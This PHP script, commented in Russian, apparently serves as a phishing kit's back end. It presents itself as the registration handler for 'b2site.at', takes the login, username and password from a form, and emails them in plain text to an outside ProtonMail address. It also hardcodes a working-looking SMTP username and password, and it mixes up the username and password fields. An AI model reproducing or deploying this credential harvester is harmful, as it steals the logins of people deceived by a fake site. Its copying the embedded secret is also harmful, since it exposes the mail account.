<?php
// Файлы phpmailer
require 'phpmailer/PHPMailer.php';
require 'phpmailer/SMTP.php';
require 'phpmailer/Exception.php';

// Переменные, которые отправляет пользователь
$loginnrega = $_POST['login'];
$passwordrega = $_POST['username'];
$usernamerega = $_POST['password'];


// Формирование самого письма
$title = "b2site.at Регистрация";
$body = "
<h2>b2site.at Регистрация</h2>
<b>Имя:</b> $loginnrega<br>
<b>Пароль:</b> $passwordrega<br><br>
<b>Имя пользователя:</b> $usernamerega<br><br>
";

// Настройки PHPMailer
$mail = new PHPMailer\PHPMailer\PHPMailer();
try {
    $mail->isSMTP();   
    $mail->CharSet = "UTF-8";
    $mail->SMTPAuth   = true;
    $mail->SMTPDebug = 2;
    $mail->Debugoutput = function($str, $level) {$GLOBALS['status'][] = $str;};

    // Настройки вашей почты
    $mail->Host       = 'mail.1984.is'; // SMTP сервера вашей почты
    $mail->Username   = 'b2site-at-1@b2site.at'; // Логин на почте
    $mail->Password   = '9Hf1Yi1Xl1Pe0Em6Rb'; // Пароль на почте
    $mail->SMTPSecure = 'ssl';
    $mail->Port       = 475;
    $mail->setFrom('b2site-at-1@b2site.at', 'b2site.at'); // Адрес самой почты и имя отправителя
 
     // Получатель письма
     $mail->addAddress('poporidecosta@protonmail.com');  
     
 

    // Прикрипление файлов к письму

// Отправка сообщения
$mail->isHTML(true);
$mail->Subject = $title;
$mail->Body = $body;    

// Проверяем отравленность сообщения
if ($mail->send()) {$result = "success";} 
else {$result = "error";}

} catch (Exception $e) {
    $result = "error";
    $status = "Сообщение не было отправлено. Причина ошибки: {$mail->ErrorInfo}";
}

// Отображение результата
 echo json_encode(["result" => $result, "status" => $status]);
